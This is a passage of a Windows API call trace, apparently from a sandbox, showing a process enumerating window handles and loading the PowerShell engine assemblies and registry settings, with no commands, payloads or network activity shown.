	[0107.669] GetWindowThreadProcessId (in: hWnd=0x2017a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x640
	[0107.669] GetLastError () returned 0x0
	[0107.669] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x700
	[0107.669] GetLastError () returned 0x0
	[0107.669] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x410
	[0107.669] GetLastError () returned 0x0
	[0107.669] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7a0
	[0107.669] GetLastError () returned 0x0
	[0107.669] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x3b4
	[0107.670] GetLastError () returned 0x0
	[0107.670] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x5cc
	[0107.670] GetLastError () returned 0x0
	[0107.670] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x5d4
	[0107.670] GetLastError () returned 0x0
	[0107.670] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7c0
	[0107.670] GetLastError () returned 0x0
	[0107.670] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x364
	[0107.670] GetLastError () returned 0x0
	[0107.670] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x240
	[0107.670] GetLastError () returned 0x0
	[0107.670] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x560
	[0107.670] GetLastError () returned 0x0
	[0107.670] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x57c
	[0107.670] GetLastError () returned 0x0
	[0107.670] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x7b0
	[0107.670] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x6a4
	[0107.671] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x32c
	[0107.671] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x670
	[0107.671] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x50c
	[0107.671] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x514
	[0107.671] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4f0
	[0107.671] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x58c
	[0107.671] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x458
	[0107.671] GetLastError () returned 0x0
	[0107.671] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x4f4
	[0107.672] GetLastError () returned 0x0
	[0107.672] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x794
	[0107.672] GetLastError () returned 0x0
	[0107.797] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x458
	[0107.797] GetLastError () returned 0x0
	[0107.797] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0xceb00 | out: lpdwProcessId=0xceb00) returned 0x778
	[0107.797] GetLastError () returned 0x0
	[0107.797] GetLastError () returned 0x0
	[0108.094] WerSetFlags () returned 0x0
	[0108.848] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0108.851] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xceedc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xceed8 | out: pulNumLanguages=0xceedc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xceed8) returned 1
	[0108.851] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xceedc, pwszLanguagesBuffer=0x2a95b38, pcchLanguagesBuffer=0xceed8 | out: pulNumLanguages=0xceedc, pwszLanguagesBuffer=0x2a95b38, pcchLanguagesBuffer=0xceed8) returned 1
	[0109.008] GetUserDefaultLocaleName (in: lpLocaleName=0x337c48, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0109.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.229] GetLastError () returned 0xcb
	[0109.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.232] GetLastError () returned 0xcb
	[0109.234] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.234] GetLastError () returned 0xcb
	[0109.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce94c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.243] GetLastError () returned 0xcb
	[0109.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce968, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.243] GetLastError () returned 0xcb
	[0109.243] SetErrorMode (uMode=0x1) returned 0x1
	[0109.243] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcede8 | out: lpFileInformation=0xcede8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0109.243] GetLastError () returned 0xcb
	[0109.243] SetErrorMode (uMode=0x1) returned 0x1
	[0109.243] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcee6c | out: lpdwHandle=0xcee6c) returned 0x94c
	[0109.329] GetLastError () returned 0x0
	[0109.329] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2a98068 | out: lpData=0x2a98068) returned 1
	[0109.330] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcee38, puLen=0xcee34 | out: lplpBuffer=0xcee38*=0x2a98104, puLen=0xcee34) returned 1
	[0109.330] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a981e0, puLen=0xcedb0) returned 1
	[0109.330] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0109.330] lstrcpyW (in: lpString1=0x337c48, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0109.330] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a98234, puLen=0xcedb0) returned 1
	[0109.330] lstrlenW (lpString="System.Management.Automation") returned 28
	[0109.330] lstrcpyW (in: lpString1=0x337c48, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0109.330] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a98290, puLen=0xcedb0) returned 1
	[0109.330] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0109.330] lstrcpyW (in: lpString1=0x337c48, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0109.330] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a982d0, puLen=0xcedb0) returned 1
	[0109.330] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0109.330] lstrcpyW (in: lpString1=0x337c48, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a98338, puLen=0xcedb0) returned 1
	[0109.331] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0109.331] lstrcpyW (in: lpString1=0x337c48, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a983d4, puLen=0xcedb0) returned 1
	[0109.331] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0109.331] lstrcpyW (in: lpString1=0x337c48, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a98438, puLen=0xcedb0) returned 1
	[0109.331] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0109.331] lstrcpyW (in: lpString1=0x337c48, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a984b4, puLen=0xcedb0) returned 1
	[0109.331] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0109.331] lstrcpyW (in: lpString1=0x337c48, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x2a9815c, puLen=0xcedb0) returned 1
	[0109.331] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0109.331] lstrcpyW (in: lpString1=0x337c48, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x0, puLen=0xcedb0) returned 0
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x0, puLen=0xcedb0) returned 0
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcedb4, puLen=0xcedb0 | out: lplpBuffer=0xcedb4*=0x0, puLen=0xcedb0) returned 0
	[0109.331] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xceda8, puLen=0xceda4 | out: lplpBuffer=0xceda8*=0x2a98104, puLen=0xceda4) returned 1
	[0109.332] VerLanguageNameW (in: wLang=0x0, szLang=0x337c48, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0109.332] VerQueryValueW (in: pBlock=0x2a98068, lpSubBlock="\\", lplpBuffer=0xcedbc, puLen=0xcedb8 | out: lplpBuffer=0xcedbc*=0x2a98090, puLen=0xcedb8) returned 1
	[0109.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.340] GetLastError () returned 0xcb
	[0109.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0109.610] GetLastError () returned 0xcb
	[0109.615] lstrlenW (lpString="䅁") returned 1
	[0109.620] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xced80 | out: phkResult=0xced80*=0x324) returned 0x0
	[0109.621] RegOpenKeyExW (in: hKey=0x324, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0xced84 | out: phkResult=0xced84*=0x328) returned 0x0
	[0109.621] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcedb8 | out: phkResult=0xcedb8*=0x32c) returned 0x0
	[0109.624] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcedf8, lpData=0x0, lpcbData=0xcedf4*=0x0 | out: lpType=0xcedf8*=0x1, lpData=0x0, lpcbData=0xcedf4*=0x56) returned 0x0
	[0109.626] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcedf8, lpData=0x337c48, lpcbData=0xcedf4*=0x56 | out: lpType=0xcedf8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xcedf4*=0x56) returned 0x0
	[0109.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.631] GetLastError () returned 0x0
	[0109.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.633] GetLastError () returned 0x0
	[0109.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0109.929] GetLastError () returned 0x0
	[0110.284] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0110.284] GetLastError () returned 0xcb
	[0112.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0112.401] GetLastError () returned 0x2
	[0112.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0112.401] GetLastError () returned 0x2
	[0113.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.429] GetLastError () returned 0xcb
	[0113.430] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.430] GetLastError () returned 0xcb
	[0113.588] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.588] GetLastError () returned 0xcb
	[0113.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.590] GetLastError () returned 0xcb
	[0113.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0113.590] GetLastError () returned 0xcb
	[0114.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0114.786] GetLastError () returned 0x0
	[0114.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0114.787] GetLastError () returned 0x0
	[0115.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0115.165] GetLastError () returned 0xcb
	[0115.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0115.215] GetLastError () returned 0xcb
	[0115.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0115.406] GetLastError () returned 0x7e
	[0115.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0115.406] GetLastError () returned 0x7e
	[0118.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0118.022] GetLastError () returned 0x2
	[0118.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0118.022] GetLastError () returned 0x2
	[0118.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.697] GetLastError () returned 0x57
	[0118.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0118.698] GetLastError () returned 0x57
	[0119.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0119.788] GetLastError () returned 0x2
	[0119.788] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0119.788] GetLastError () returned 0x2
	[0120.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0120.924] GetLastError () returned 0x2
	[0120.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xce8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0120.924] GetLastError () returned 0x2
	[0121.582] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0121.582] GetLastError () returned 0xcb
	[0121.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce988, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.583] GetLastError () returned 0xcb
	[0121.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.584] GetLastError () returned 0xcb
	[0121.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.584] GetLastError () returned 0xcb
	[0122.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xce938, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0122.356] GetLastError () returned 0xcb
